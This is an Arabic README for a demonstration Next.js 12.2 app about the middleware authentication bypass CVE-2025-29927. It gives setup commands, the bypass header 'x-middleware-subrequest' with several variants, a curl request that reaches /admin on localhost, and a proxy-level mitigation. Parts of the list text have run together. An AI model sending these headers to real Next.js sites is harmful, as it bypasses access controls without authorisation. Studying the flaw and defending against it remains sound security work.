
🔓 عرض توضيحي لتجاوز المصادقة في Next.js - تطبيق تعليمي يوضح ثغرة تجاوز المصادقة في middleware CVE-2025-29927. ⚠️ للاستخدام التعليمي فقط. [تم إنشاؤه باستخدام الذكاء الاصطناعي]
تطبيق بسيط لإثبات المفهوم باستخدام Next.js 12.2.
npm install
npm run dev
سيكون التطبيق متاحًا على http://localhost:3000
npm run dev - تشغيل خادم التطويرnpm run build - بناء نسخة الإنتاجnpm run start - تشغيل خادم الإنتاجقم بتعديل pages/index.js لتغيير صفحة مرحبا بالعالم. يستخدم التطبيق أنماطًا مضمّنة للتبسيط، ولكن يمكنك إضافة ملفات CSS أو مكتبات تنسيق حسب الحاجة.
يوضح هذا التطبيق ثغرة CVE-2025-29927 التي اكتشفها Rachid.A (zhero) و Yasser Allam (inzo_):
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest على مستوى الوكيل/CDN⚠️ تحذير: هذا يعرض ثغرة CVE حقيقية لأغراض تعليمية فقط!
يستخدم هذا التطبيق أنماطًا مضمّنة للتبسيط. بالنسبة لتطبيق إنتاجي، فكّر في استخدام:
برمجة سعيدة! 🚀